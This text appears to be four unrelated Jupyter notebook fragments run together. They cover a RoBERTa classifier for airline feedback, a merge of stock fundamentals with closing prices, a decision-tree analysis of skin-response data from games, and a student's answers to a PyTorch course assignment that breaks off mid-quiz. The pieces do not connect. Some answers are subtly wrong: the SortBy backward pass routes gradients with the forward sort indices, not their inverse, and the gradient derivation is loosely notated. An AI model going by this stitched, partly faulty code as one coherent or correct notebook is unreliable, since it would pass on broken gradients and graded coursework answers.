labels_ids = { 'Service' : 0, 'Company' : 1, 'Staff' : 2, 'Price' : 3, 'Travel' : 4, 'Aircraft equipment' : 5, 'Food' : 6, 'Safety' : 7, 'Boarding' : 8, 'Luggage' : 9,'Information' : 10, 'Others' : 11, 'Multiple' : 12, 'NA' : 13 } # How many labels are we using in training. # This is used to decide size of classification head. n_labels = len(labels_ids)Helper FunctionsAll Classes and functions that will be used in this notebook are kept under this section to help maintain a clean look of the notebook:* AirlineFeedbackDataset* train* validationclass AirlineFeedbackDataset(Dataset): r"""PyTorch Dataset class for loading data. This is where the data parsing happens and where the text gets encoded using loaded tokenizer. This class is built with reusability in mind: it can be used as is as long as the `dataloader` outputs a batch in dictionary format that can be passed straight into the model - `model(**batch)`. Arguments: path (:obj:`str`): Path to the data partition. use_tokenizer (:obj:`transformers.tokenization_?`): Transformer type tokenizer used to process raw text into numbers. labels_ids (:obj:`dict`): Dictionary to encode any labels names into numbers. Keys map to labels names and Values map to number associated to those labels. max_sequence_len (:obj:`int`, `optional`) Value to indicate the maximum desired sequence to truncate or pad text sequences. If no value is passed it will used maximum sequence size supported by the tokenizer and model. """ def __init__(self, path, use_tokenizer, labels_ids, max_sequence_len=None): # Read in the data df_train = pd.read_csv(path, delimiter=';', header= 0, dtype= str, keep_default_na=False, encoding= 'utf-8') df_train = df_train.dropna() # Check max sequence length. max_sequence_len = 64 # use_tokenizer.max_len if max_sequence_len is None else max_sequence_len texts = [] labels = [] print('Reading partitions...') # Since the labels are defined by folders with data we loop # through each label. [labels.append(labels_ids[label]) for label in df_train['Aspect_Category'].astype(str)] [texts.append(sentence) for sentence in df_train['Sentence'].astype(str)] # Number of exmaples. self.n_examples = len(labels) # Use tokenizer on texts. This can take a while. print('Using tokenizer on all texts. This can take a while...') self.inputs = use_tokenizer(texts, add_special_tokens=True, truncation=True, padding=True, return_tensors='pt', max_length=max_sequence_len) # Get maximum sequence length. self.sequence_len = self.inputs['input_ids'].shape[-1] print('Texts padded or truncated to %d length!' % self.sequence_len) # Add labels. self.inputs.update({'labels':torch.tensor(labels)}) print('Finished!\n') return def __len__(self): r"""When used `len` return the number of examples. """ return self.n_examples def __getitem__(self, item): r"""Given an index return an example from the position. Arguments: item (:obj:`int`): Index position to pick an example to return. Returns: :obj:`Dict[str, object]`: Dictionary of inputs that feed into the model. It holddes the statement `model(**Returned Dictionary)`. """ return {key: self.inputs[key][item] for key in self.inputs.keys()} def train(dataloader, optimizer_, scheduler_, device_): r""" Train pytorch model on a single pass through the data loader. It will use the global variable `model` which is the transformer model loaded on `_device` that we want to train on. 
This function is built with reusability in mind: it can be used as is as long as the `dataloader` outputs a batch in dictionary format that can be passed straight into the model - `model(**batch)`. Arguments: dataloader (:obj:`torch.utils.data.dataloader.DataLoader`): Parsed data into batches of tensors. optimizer_ (:obj:`transformers.optimization.AdamW`): Optimizer used for training. scheduler_ (:obj:`torch.optim.lr_scheduler.LambdaLR`): PyTorch scheduler. device_ (:obj:`torch.device`): Device used to load tensors before feeding to model. Returns: :obj:`List[List[int], List[int], float]`: List of [True Labels, Predicted Labels, Train Average Loss]. """ # Use global variable for model. global model # Tracking variables. predictions_labels = [] true_labels = [] # Total loss for this epoch. total_loss = 0 # Put the model into training mode. model.train() # For each batch of training data... for batch in tqdm(dataloader, total=len(dataloader)): # Add original labels - use later for evaluation. true_labels += batch['labels'].numpy().flatten().tolist() # move batch to device batch = {k:v.type(torch.long).to(device_) for k,v in batch.items()} # Always clear any previously calculated gradients before performing a # backward pass. model.zero_grad() # Perform a forward pass (evaluate the model on this training batch). # This will return the loss (rather than the model output) because we # have provided the `labels`. # The documentation for this a bert model function is here: # https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification outputs = model(**batch) # The call to `model` always returns a tuple, so we need to pull the # loss value out of the tuple along with the logits. We will use logits # later to calculate training accuracy. loss, logits = outputs[:2] # Accumulate the training loss over all of the batches so that we can # calculate the average loss at the end. `loss` is a Tensor containing a # single value; the `.item()` function just returns the Python value # from the tensor. total_loss += loss.item() # Perform a backward pass to calculate the gradients. loss.backward() # Clip the norm of the gradients to 1.0. # This is to help prevent the "exploding gradients" problem. torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0) # Update parameters and take a step using the computed gradient. # The optimizer dictates the "update rule"--how the parameters are # modified based on their gradients, the learning rate, etc. optimizer.step() # Update the learning rate. scheduler.step() # Move logits and labels to CPU logits = logits.detach().cpu().numpy() # Convert these logits to list of predicted labels values. predictions_labels += logits.argmax(axis=-1).flatten().tolist() # Calculate the average loss over the training data. avg_epoch_loss = total_loss / len(dataloader) # Return all true labels and prediction for future evaluations. return true_labels, predictions_labels, avg_epoch_loss def validation(dataloader, device_): r"""Validation function to evaluate model performance on a separate set of data. This function will return the true and predicted labels so we can use later to evaluate the model's performance. This function is built with reusability in mind: it can be used as is as long as the `dataloader` outputs a batch in dictionary format that can be passed straight into the model - `model(**batch)`. Arguments: dataloader (:obj:`torch.utils.data.dataloader.DataLoader`): Parsed data into batches of tensors. 
device_ (:obj:`torch.device`): Device used to load tensors before feeding to model. Returns: :obj:`List[List[int], List[int], float]`: List of [True Labels, Predicted Labels, Train Average Loss] """ # Use global variable for model. global model # Tracking variables predictions_labels = [] true_labels = [] #total loss for this epoch. total_loss = 0 # Put the model in evaluation mode--the dropout layers behave differently # during evaluation. model.eval() # Evaluate data for one epoch for batch in tqdm(dataloader, total=len(dataloader)): # add original labels true_labels += batch['labels'].numpy().flatten().tolist() # move batch to device batch = {k:v.type(torch.long).to(device_) for k,v in batch.items()} # Telling the model not to compute or store gradients, saving memory and # speeding up validation with torch.no_grad(): # Forward pass, calculate logit predictions. # This will return the logits rather than the loss because we have # not provided labels. # token_type_ids is the same as the "segment ids", which # differentiates sentence 1 and 2 in 2-sentence tasks. # The documentation for this `model` function is here: # https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification outputs = model(**batch) # The call to `model` always returns a tuple, so we need to pull the # loss value out of the tuple along with the logits. We will use logits # later to to calculate training accuracy. loss, logits = outputs[:2] # Move logits and labels to CPU logits = logits.detach().cpu().numpy() # Accumulate the training loss over all of the batches so that we can # calculate the average loss at the end. `loss` is a Tensor containing a # single value; the `.item()` function just returns the Python value # from the tensor. total_loss += loss.item() # get predicitons to list predict_content = logits.argmax(axis=-1).flatten().tolist() # update list predictions_labels += predict_content # Calculate the average loss over the training data. avg_epoch_loss = total_loss / len(dataloader) # Return all true labels and prediciton for future evaluations. return true_labels, predictions_labels, avg_epoch_lossLoad Model and TokenizerLoding the three esential parts of pretrained transformers: configuration, tokenizer and model. We also need to load model to the device we're planning to use (GPU / CPU).# Get model configuration. print('Loading configuration...') model_config = AutoConfig.from_pretrained(pretrained_model_name_or_path=model_name_or_path, num_labels=n_labels) # Get model's tokenizer. print('Loading tokenizer...') tokenizer = AutoTokenizer.from_pretrained(pretrained_model_name_or_path=model_name_or_path) # Get the actual model. print('Loading model...') model = AutoModelForSequenceClassification.from_pretrained(pretrained_model_name_or_path=model_name_or_path, config=model_config) # Load model to defined device. model.to(device) print('Model loaded to `%s`'%device)Loading configuration... Loading tokenizer... Loading model... Some weights of the model checkpoint at roberta-base were not used when initializing RobertaForSequenceClassification: ['lm_head.bias', 'lm_head.dense.weight', 'lm_head.dense.bias', 'lm_head.layer_norm.weight', 'lm_head.layer_norm.bias', 'lm_head.decoder.weight', 'roberta.pooler.dense.weight', 'roberta.pooler.dense.bias'] - This IS expected if you are initializing RobertaForSequenceClassification from the checkpoint of a model trained on another task or with another architecture (e.g. 
initializing a BertForSequenceClassification model from a BertForPreTraining model). - This IS NOT expected if you are initializing RobertaForSequenceClassification from the checkpoint of a model that you expect to be exactly identical (initializing a BertForSequenceClassification model from a BertForSequenceClassification model). Some weights of RobertaForSequenceClassification were not initialized from the model checkpoint at roberta-base an[...]Dataset and DataLoaderCreate the PyTorch Dataset and DataLoader objects that will be used to feed data into our model.print('Dealing with Train...') # Create pytorch dataset. train_dataset = AirlineFeedbackDataset(path="path/to/train.csv", use_tokenizer=tokenizer, labels_ids=labels_ids, max_sequence_len=max_length) print('Created `train_dataset` with %d examples!'%len(train_dataset)) # Move pytorch dataset into dataloader. train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True) print('Created `train_dataloader` with %d batches!'%len(train_dataloader)) print() print('Dealing with ...') # Create pytorch dataset. valid_dataset = AirlineFeedbackDataset(path="path/to/valid.csv", use_tokenizer=tokenizer, labels_ids=labels_ids, max_sequence_len=max_length) print('Created `valid_dataset` with %d examples!'%len(valid_dataset)) # Move pytorch dataset into dataloader. valid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle=False) print('Created `eval_dataloader` with %d batches!'%len(valid_dataloader))Dealing with Train... Reading partitions... Using tokenizer on all texts. This can take a while... Texts padded or truncated to 64 length! Finished! Created `train_dataset` with 1996 examples! Created `train_dataloader` with 32 batches! Dealing with ... Reading partitions... Using tokenizer on all texts. This can take a while... Texts padded or truncated to 64 length! Finished! Created `valid_dataset` with 250 examples! Created `eval_dataloader` with 4 batches!TrainCreate optimizer and scheduler use by PyTorch in training.Loop through the number of defined epochs and call the **train** and **validation** functions.Outputs similar info after each epoch as in Keras: *train_loss: - val_loss: - train_acc: - valid_acc*.After training, plot train and validation loss and accuracy curves to check how the training went.start_time = datetime.now() # Note: AdamW is a class from the huggingface library (as opposed to pytorch) optimizer = AdamW(model.parameters(), lr = 3e-5, # args.learning_rate eps = 1e-8 # args.adam_epsilon ) # Total number of training steps is number of batches * number of epochs. # `train_dataloader` contains batched data so `len(train_dataloader)` gives # us the number of batches. total_steps = len(train_dataloader) * epochs # Create the learning rate scheduler. scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps = 0, # Default value in run_glue.py num_training_steps = total_steps) # Store the average loss after each epoch so we can plot them. all_loss = {'train_loss':[], 'val_loss':[]} all_acc = {'train_acc':[], 'val_acc':[]} # Loop through each epoch. print('Epoch') for epoch in tqdm(range(epochs)): print() print('Training on batches...') # Perform one full pass over the training set. train_labels, train_predict, train_loss = train(train_dataloader, optimizer, scheduler, device) train_acc = accuracy_score(train_labels, train_predict) # Get prediction form model on validation data. 
print('Validation on batches...') valid_labels, valid_predict, val_loss = validation(valid_dataloader, device) val_acc = accuracy_score(valid_labels, valid_predict) # Print loss and accuracy values to see how training evolves. print(" train_loss: %.5f - val_loss: %.5f - train_acc: %.5f - valid_acc: %.5f"%(train_loss, val_loss, train_acc, val_acc)) print() # Store the loss value for plotting the learning curve. all_loss['train_loss'].append(train_loss) all_loss['val_loss'].append(val_loss) all_acc['train_acc'].append(train_acc) all_acc['val_acc'].append(val_acc) end_time = datetime.now() print('Duration: {}'.format(end_time - start_time)) # Plot loss curves. plot_dict(all_loss, use_xlabel='Epochs', use_ylabel='Value', use_linestyles=['-', '--']) # Plot accuracy curves. plot_dict(all_acc, use_xlabel='Epochs', use_ylabel='Value', use_linestyles=['-', '--']) Epoch Evaluate When dealing with classification, it is useful to look at precision, recall and F1 score. A good gauge to have when evaluating a model is the confusion matrix. # SAVE MODELS TO THE MODELS FOLDER WITH TORCH torch.save(tokenizer, "models/r_aspect_tokenizer_3e") torch.save(model, "models/r_aspect_model_3e") torch.save(device, "models/r_aspect_device_3e") # # some time later... # # load the model from disk # tokenizer = torch.load("models/r_aspect_tokenizer_3e") # model = torch.load("models/r_aspect_model_3e") # device = torch.load("models/r_aspect_device_3e") # Evaluation on test data. # Create pytorch dataset. test_dataset = AirlineFeedbackDataset(path="path/to/test.csv", use_tokenizer=tokenizer, labels_ids=labels_ids, max_sequence_len=max_length) print('Created `test_dataset` with %d examples!'%len(test_dataset)) # Move pytorch dataset into dataloader. test_dataloader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False) print('Created `test_dataloader` with %d batches!'%len(test_dataloader)) true_labels, predictions_labels, avg_epoch_loss = validation(test_dataloader, device) # Create the evaluation report. evaluation_report = classification_report(true_labels, predictions_labels, labels=list(labels_ids.values()), target_names=list(labels_ids.keys())) # Show the evaluation report. print(evaluation_report) # Plot confusion matrix.
plot_confusion_matrix(y_true=true_labels, y_pred=predictions_labels, classes=list(labels_ids.keys()), normalize=False, width= 2, height= 2, magnify=3, ); # Check examples of classification comparing gold label and prediction # the output is hidden because it shows private data test_df = pd.read_csv("path/to/test.csv", delimiter=';', header= 0, dtype= str, keep_default_na=False, encoding= 'utf-8') sentences = test_df['Sentence'] def get_key(val): """" function to return the key for any value in a dictionary """" for key, value in labels_ids.items(): if val == value: return key return "key doesn't exist" i = 1 for s, gold, pred in zip(sentences, true_labels, predictions_labels): print('SENTENCE', i, ': ', s) print('GOLD : ', get_key(gold), ' PREDICTION -->', get_key(pred)) i += 1 print() print()Import and Mergeimport matplotlib.pyplot as plt import pandas as pd import numpy as np import pathlib # read csv file fundamentals = pd.read_csv('../data/fundamentals.csv') # group by ticker fundamentals_group = fundamentals.groupby ('Ticker Symbol') fundamentals_group.head() # drop columns we don't need fundamentals_clean = fundamentals.set_index('Ticker Symbol').loc[ : , ['Period Ending', 'Net Income','Profit Margin' ,'Quick Ratio' ,'Total Assets', 'Total Liabilities', 'Earnings Per Share', 'Estimated Shares Outstanding','Total Current Assets', 'Total Current Liabilities' ] ] def clean_date(date): if len(date) > 10: clean_date= date[:10] else: clean_date= date return clean_date assert clean_date('2016-12-30 00:00:00') == '2016-12-30' assert clean_date('2016-11-06 00:00:00') == '2016-11-06' assert clean_date( '2016-12-30')=='2016-12-30' fundamentals_clean['Period Ending'] = fundamentals_clean['Period Ending'].apply(clean_date) final_fund =fundamentals_clean.loc[(fundamentals_clean['Period Ending'] == '2015-12-31') ] final_fund # read prices csv prices= pd.read_csv('../data/prices.csv') prices.head() # drop columns we don't need prices_index =prices.set_index('symbol').loc[ : , ['date', 'close'] ] prices_index['date'] = prices_index['date'].apply(clean_date) final_prices = prices_index.loc[(prices_index['date'] == '2015-12-30') ] final_prices.index.name = 'Ticker Symbol' final_prices_renamed = final_prices.rename(columns={"close": "Closing Price"}) # merge 2 datasets in order to have the stock price added to the needed info for stock analyzing Final_data_df =pd.merge( left = final_fund , right= final_prices_renamed['Closing Price'] , how="inner", left_index= True , right_index = True ) Final_data_df pwd # export data into csv Final_data_df.to_csv("../data/stocks_closing_info_2015.csv")Statistical analysisdef extract_split_data(data): content = re.findall("\[(.*?)\]", data) values = [] for c in content[0].split(","): c = (c.strip()[1:-1]) if len(c)>21: x, y = c.split("#") values.append(int(x)) return values def gsr_analysis(span, plotting = True): sessionCount = 0 veryBeginning = [] nearEnd = [] duringGame = [] size = span//2 + 1 # half for url in glob.glob("/Users/xueguoliang/Desktop/Data_v2/*.csv"): player = pd.read_csv(url, delimiter=";") for session in player['GSR']: rate = extract_split_data(session) if len(rate)>span: sessionCount += 1 veryBeginning.append(rate[0:span]) nearEnd.append(rate[-1-span:-1]) if len(rate)%2 == 0: duringGame.append(rate[len(rate)//2-size+1:len(rate)//2+size-1]) else: duringGame.append(rate[len(rate)//2-size+1:len(rate)//2+size-1]) print("We have collected {} games.".format(sessionCount)) print("The size of GSR sample is {}.".format(span)) if(plotting): #plot fig, ax = 
plt.subplots(3, 2, figsize=(15,15)) labels = ["Postive", "Negative"] ########################################## Begin ################################################## std_begin = [] slope_begin = [] for item in veryBeginning: slope_begin.append((item[-1]-item[0])/(len(item)-1)) std_begin.append(round(np.std(item), 2)) begin_pos = sum([1 for x in slope_begin if x > 0]) begin_nag = sum([1 for x in slope_begin if x < 0]) dict_begin = {1:begin_pos, 2:begin_nag} ax[0][0].set_title("Distribution of STD for Beginning of game") ax[0][0].hist(std_begin, bins=50, range=(min(std_begin), max(std_begin))) #ax[0][0].set_xlim([0,10]) #ax[0][0].set_ylim([0,400]) ax[0][1].set_title("Distribution of Slope(+,-) for Beginning of game") ax[0][1].bar(range(len(dict_begin)), dict_begin.values(), color='g') ax[0][1].set_xticklabels(("","","Positive","","","", "Negative")) ########################################## During ################################################# std_during = [] slope_during = [] for item in duringGame: slope_during.append((item[-1]-item[0])/(len(item)-1)) std_during.append(round(np.std(item), 2)) during_pos = sum([1 for x in slope_during if x > 0]) during_nag = sum([1 for x in slope_during if x < 0]) dict_during = {1:during_pos, 2:during_nag} ax[1][0].set_title("Distribution of STD for During of game") ax[1][0].hist(std_during, bins=50, range=(min(std_during), max(std_during))) #ax[1][0].set_xlim([0,300]) ax[1][1].set_title("Distribution of Slope(+,-) for During of game") ax[1][1].bar(list(dict_during.keys()), dict_during.values(), color='g') ax[1][1].set_xticklabels(("","","Positive","","","", "Negative")) ########################################## End ################################################### std_end = [] slope_end = [] for item in nearEnd: slope_end.append((item[-1]-item[0])/(len(item)-1)) std_end.append(round(np.std(item), 2)) end_pos = sum([1 for x in slope_end if x > 0]) end_nag = sum([1 for x in slope_end if x < 0]) dict_end = {1:end_pos, 2:end_nag} ax[2][0].set_title("Distribution of STD for End of game") ax[2][0].hist(std_end, bins=50, range=(min(std_end), max(std_end))) #ax[2][0].set_xlim([0,100]) ax[2][1].set_title("Distribution of Slope(+,-) for End of game") ax[2][1].bar(list(dict_end.keys()), dict_end.values(), color='g') ax[2][1].set_xticklabels(("","","Positive","","","", "Negative")) plt.show() return veryBeginning, duringGame, nearEnd test = [20, 50, 100, 150, 250] for t in test: gsr_analysis(t)We have collected 570 games. 
The size of GSR sample is 20.Decision Tree / SVM Modelbegin, during, end = gsr_analysis(20, False) dict_begin = {} label_begin = [] var_begin = [] max_begin = [] min_begin = [] first_quartile_begin = [] third_quartile_begin = [] average_begin = [] median_begin = [] for b in begin: label_begin.append(int(0)) var_begin.append(np.var(b)) max_begin.append(np.max(b)) min_begin.append(np.min(b)) first_quartile_begin.append(np.percentile(b, 25)) third_quartile_begin.append(np.percentile(b, 75)) average_begin.append(np.average(b)) median_begin.append(np.median(b)) dict_begin["label"] = label_begin dict_begin["variance"] = var_begin dict_begin["max"] = max_begin dict_begin["min"] = min_begin dict_begin["first_quartile"] = first_quartile_begin dict_begin["third_quartile"] = third_quartile_begin dict_begin["average"] = average_begin dict_begin["median"] = median_begin f1 = pd.DataFrame(dict_begin) print(f1.info()) dict_during = {} label_during = [] var_during = [] max_during = [] min_during = [] first_quartile_during = [] third_quartile_during = [] average_during = [] median_during = [] for b in during: label_during.append(int(1)) var_during.append(np.var(b)) max_during.append(np.max(b)) min_during.append(np.min(b)) first_quartile_during.append(np.percentile(b, 25)) third_quartile_during.append(np.percentile(b, 75)) average_during.append(np.average(b)) median_during.append(np.median(b)) dict_during["label"] = label_during dict_during["variance"] = var_during dict_during["max"] = max_during dict_during["min"] = min_during dict_during["first_quartile"] = first_quartile_during dict_during["third_quartile"] = third_quartile_during dict_during["average"] = average_during dict_during["median"] = median_during f2 = pd.DataFrame(dict_during) print(f2.info()) dict_end = {} label_end = [] var_end = [] max_end = [] min_end = [] first_quartile_end = [] third_quartile_end = [] average_end = [] median_end = [] for b in end: label_end.append(int(2)) var_end.append(np.var(b)) max_end.append(np.max(b)) min_end.append(np.min(b)) first_quartile_end.append(np.percentile(b, 25)) third_quartile_end.append(np.percentile(b, 75)) average_end.append(np.average(b)) median_end.append(np.median(b)) dict_end["label"] = label_end dict_end["variance"] = var_end dict_end["max"] = max_end dict_end["min"] = min_end dict_end["first_quartile"] = first_quartile_end dict_end["third_quartile"] = third_quartile_end dict_end["average"] = average_end dict_end["median"] = median_end f3 = pd.DataFrame(dict_end) final_data = pd.concat([f1,f2,f3], ignore_index=True) epochs = 10 for i in range(epochs): final_data = final_data.sample(frac=1) train, test = train_test_split(final_data, test_size = 0.2) y = train["label"] X = train.drop("label", axis=1) #X = train[['average', 'max', 'median', 'min','variance']] tree_clf = DecisionTreeClassifier(random_state=0, max_depth=5) tree_clf.fit(X, y) print("the score for each epoch: {}".format(tree_clf.score(X,y))) print(X.columns) tree_clf.feature_importances_ export_graphviz( tree_clf, out_file= "bird_tree.dot", feature_names=X.columns, class_names=["begin","during","end"], rounded=True, filled=True ) from subprocess import check_call check_call(['dot','-Tpng','bird_tree.dot','-o','bird_tree.png']) y_test = test["label"] X_test = test.drop("label", axis=1) tree_clf.score(X_test, y_test)Assignment 1The first assignment has two parts. The first part concerns PyTorch and the second part is about feature engineering for a basic NLP task. Instructions1. 
Make a copy of this notebook - Click on "File -> Save a copy in Drive" and open it in Colab afterwards - Alternatively, download the notebook and work on it on your local machine. However, keep in mind that you will have to make sure it still runs on Colab afterwards and does not depend on any packages that you installed locally2. Rename your notebook to **surname_forename_studentnumber.ipynb** - Make sure to exactly follow this naming scheme (don't replace `_` with `-` or something like that) - **Failure to comply with this scheme results in -10 points!**3. For math exercises, use $\LaTeX$ to typset your answer4. For coding exercises, insert your code at ` TODO` statements5. For multiple-choice questions, choose an answer from the drop-down list6. Before submitting your notebook, **make sure that it runs without errors when executed from start to end on Colab** - To check this, reload your notebook and the Python kernel, and run the notebook from the first to the last cell - **If your notebook throws any errors, you will be penalized by -25 points in addition to any penalities from incorrect answers** - We are not going to fix any errors (no matter how small) to make your code work7. Download your notebook and submit it on Moodle - Click on "File -> Download .ipynb" Notebook Setup [don't change!]%%shell pip install torch import torch from torch import nn torch.__version__Part I: PyTorch [50 points] Linear Algebra [30 points] PyTorch Tensors [5 points] Construct Scaled Identity Matrix [1 point]Given $n \in \mathbb{N}$ and $c \in \mathbb{R}$, construct a matrix $\mathbf{X} \in \mathbb{R}^{n\ \times\ n}$ where $\mathbf{X}$ has $c$ on its diagonal and zeros everywhere else.def construct_scaled_identity(n, c): a = torch.zeros((n, n)) # np.fill_diagonal(a, c) torch.diagonal(a).fill_(c) return a construct_scaled_identity(4, 3.2)Mean Diagonal [1 point]Given a square matrix $\mathbf{X}\in\mathbb{R}^{n\ \times\ n}$, return the mean of its diagonal.def mean_diagonal(x): a = torch.mean(torch.diagonal(x)) return a x = torch.arange(0, 16, dtype=torch.float).view(4, 4) mean_diagonal(x)Indexing [1 point]Given a matrix $\mathbf{X}\in\mathbb{R}^{n\ \times\ m}$ and $i,j \in \mathbb{N}$, return the submatrix $\mathbf{Y}\in\mathbb{R}^{i\ \times\ j}$ of the last i rows and last j columns of $\mathbf{X}$ (i.e. the bottom right submatrix of the given size). You can assume that $i \leq n$ and $j \leq m$.def bottom_right_matrix(x, i, j): a = x[-i:, -j:] return a x = torch.arange(0, 12).view(3, 4) bottom_right_matrix(x, 2, 2)Transpose Sum [2 points]Given a tensor $\mathcal{X}\in\mathbb{R}^{i\ \times\ j\ \times\ k}$, return a transposed tensor $\mathcal{y}\in\mathbb{R}^{j\ \times\ i}$ whose values in the third dimension are summed up.def transpose_sum(x): a = torch.sum(x, dim=2) a = torch.transpose(a, 0, 1) return a x = torch.arange(0, 12).view(2, 3, 2) transpose_sum(x)Matrix-vector Multiplication [10 points] Implement five unique ways for multiplying a matrix A with a vector b. **Each PyTorch function is allowed to be used in only one of the five implementations**. For instance, if you use `unsqueeze` in one of the methods, you are not allowed to use it for the other five implementations. Furthermore, functions in `torch` and in `torch.Tensor` are treated as the same function (i.e. using `torch.add(x, y)`, `x.add(y)` and `x + y` are all treated as the same function and hence are not allowed to be used in more than one implementation). 
Your code needs to be applicable to any matrix $A \in \mathbb{R}^{n\ \times\ m }$ and vector $b\in\mathbb{R}^m$.def matrixvector1(A, b): return torch.matmul(A, b) def matrixvector2(A, b): return A @ b def matrixvector3(A, b): return A.mm(b.unsqueeze(1)).squeeze(-1) def matrixvector4(A, b): return torch.einsum('ij,j->i', A, b) def matrixvector5(A, b): return torch.mv(A, b)Backprop [15 points] Forward [2 points]Implement $\mathbf{y}\odot\text{tanh}\left(\mathbf{W}\mathbf{x}+\mathbf{b}\right)$ in PyTorch without using a linear layer implementation (i.e. do the matrix-vector mulitplication and addition of a bias term yourself). Note that we are not looking for a batched implementation, so assume $\mathbf{y},\mathbf{b} \in \mathbb{R}^n, \mathbf{x}\in\mathbb{R}^m$ and $\mathbf{W}\in\mathbb{R}^{n\ \times\ m}$def fw(y, W, x, b): result = y * torch.tanh(torch.matmul(W, x) + b) return resultGradient [10 points]Derive $\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}}\left[\mathbf{y}\odot\text{tanh}\left(\mathbf{W}\mathbf{x}+\mathbf{b}\right)\right]$ analytically. Here $\mathbf{z}$ is an _upstream (error) gradient_ and we are interested in calculating the _downstream gradient_ for $\mathbf{x}$. Make sure to write down all intermediate steps and not just the final result. Let's define:\begin{equation}h = \text{tanh}(z)\\z = Wx + b\end{equation}We can therefore write:\begin{align}\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}}\left[\mathbf{y}\odot\text{tanh}\left(\mathbf{W}\mathbf{x}+\mathbf{b}\right)\right] &=\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}} [\mathbf{y}\odot{h}]\end{align}Also, by using the chain rule:\begin{equation}\frac{\partial}{\partial \mathbf{x}} = \frac{\partial}{\partial h}\frac{\partial h}{\partial z}\frac{\partial z}{\partial \mathbf{x}}\end{equation}And, deriving the product:\begin{equation}\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}} [\mathbf{y}\odot{h}] = \mathbf{z}^\top \mathbf{y} \frac{\partial} {\partial \mathbf{x}} \odot{h} + {h} \odot \frac{\partial} {\partial \mathbf{x}} \mathbf{y}\end{equation}We can remove the second portion since:\begin{equation}\frac{\partial} {\partial \mathbf{x}} \mathbf{y} = 0\end{equation}So finally:\begin{equation}\\\mathbf{z}^\top\frac{\partial}{\partial \mathbf{x}} [\mathbf{y}\odot{h}] = \mathbf{z}^\top\frac{\partial}{\partial h}\frac{\partial h}{\partial z}\frac{\partial z}{\partial \mathbf{x}} [\mathbf{y}\odot{h}]\\\mathbf{z}^\top\frac{\partial}{\partial h}\frac{\partial h}{\partial z}\frac{\partial z}{\partial \mathbf{x}} [\mathbf{y}\odot{h}] = \mathbf{z}^\top diag(\mathbf{y}\odot\frac{\partial h}{\partial z}\frac{\partial z}{\partial \mathbf{x}}[h])\\\mathbf{z}^\top diag(\mathbf{y}\odot\frac{\partial h}{\partial z}\frac{\partial z}{\partial \mathbf{x}}[\text{tanh}(z)] = \mathbf{z}^\top diag(\mathbf{y}\odot(1 - \text{tanh}(z)^2))\frac{\partial z}{\partial \mathbf{x}}[z]\\\mathbf{z}^\top diag(\mathbf{y}\odot(1 - \text{tanh}(z)^2))\frac{\partial z}{\partial \mathbf{x}}[z] = \mathbf{z}^\top diag(\mathbf{y}\odot(1 - \text{tanh}(z)^2))W\end{equation}Where:\begin{equation}\frac{\partial}{\partial h} = diag(\mathbf{y})\\\frac{\partial h}{\partial z} = 1 - tanh(z)^2\\\frac{\partial z}{\partial \mathbf{x}} = W\end{equation}The first derivative is defined as such by using a property of the Hadamard product where:\begin{equation}\mathbf{A}\odot\mathbf{X} = diag(\mathbf{A})\mathbf{X}\end{equation} Backward [3 points]Implement the calculation for $\mathbf{z}^\top\frac{\partial}{\partial 
\mathbf{x}}\left[\mathbf{y}\odot\text{tanh}\left(\mathbf{W}\mathbf{x}+\mathbf{b}\right)\right]$ in PyTorch (i.e. without using PyTorch Autograd's `.backward`) using your derivation above.def bw(y, W, x, b, grad_output): result = torch.diag(y * (1 - torch.tanh(torch.matmul(W, x) + b)**2)) result = grad_output.T.matmul(result.matmul(W)) return resultSortBy PyTorch Autograd Function [10 points] Implement a PyTorch Autograd function `SortBy` which takes two inputs:- `x` is a matrix of size `m x n` - `s` is an accompanying vector of size `m``SortBy` should sort the position of the row vectors in `x` using the accompanying scores in `s` in ascending order. For example, given$$\begin{align}\mathbf{X} &= \left[\begin{matrix}0.2 & -0.4 & 0.3\\1.2 & 2.3 & -2.1\\0.1 & -0.1 & 2\end{matrix}\right]&\mathbf{s} &=\left[\begin{matrix}0.2\\-0.1\\3\end{matrix}\right]\end{align}$$ the forward pass of `SortBy` should return$$\mathbf{Y} = \left[\begin{matrix}1.2 & 2.3 & -2.1\\0.2 & -0.4 & 0.3\\0.1 & -0.1 & 2\end{matrix}\right]$$.Furthermore, given an upstream gradient `grad_output` (i.e. a matrix of the same size as X), the backward pass of `SortBy` should calculate the gradient of `x`, effectively rerouting the gradient to the original position of the vectors before sorting. For example, if the first row vector of the upstream gradient in our example above is a vector $\mathbf{z}$, the gradient of `x` would have $\mathbf{z}$ as its second row vector.Note that, `SortBy` will only be differentiable w.r.t. to x, and is not be differentiable w.r.t. the sorting procedure to provie a gradient for `s`. **You are not allowed to use any Python loops in your implementation. If you use Python loops for your solution, we will only give you half of the points!**Hints:- You are allowed to use `torch.sort` in your implementation of the forward pass.- Similarly to the example we had in the lecture, you can use the context `ctx` to save tensors on the forward pass that you might need to reuse on the backward pass.from torch.autograd import Function class SortBy(Function): @staticmethod def forward(ctx, x, s): result = x[s.sort().indices] ctx.save_for_backward(result, s) return result @staticmethod def backward(ctx, grad_output): result, s = ctx.saved_tensors return grad_output[s.sort().indices], NoneMultiple Choice Quiz [10 points]Answer the following questions by selecting the correct most specific answer (or `None` in case all answers are wrong).1. Which of the following operations cannot be calculated using `@`?2. What is gradient checking for?3. Why don't we use the finite differences method of gradient checking to calculate gradients instead of using backpropagation?4. Which of the following operations cannot be expressed as a single einsum string?5. When should you prefer using `view` instead of `reshape`?6. Which of the following statements is true if you construct a PyTorch tensor from a NumPy array using `torch.from_numpy`?7. Which one is a sufficient condition for being able to broadcast an operation between two tensors?8. What is the difference between a torch.Tensor and a torch.nn.Parameter?9. Given a convex loss function and a sufficiently small learning rate, stochastic gradient descent is guaranteed to?10. 
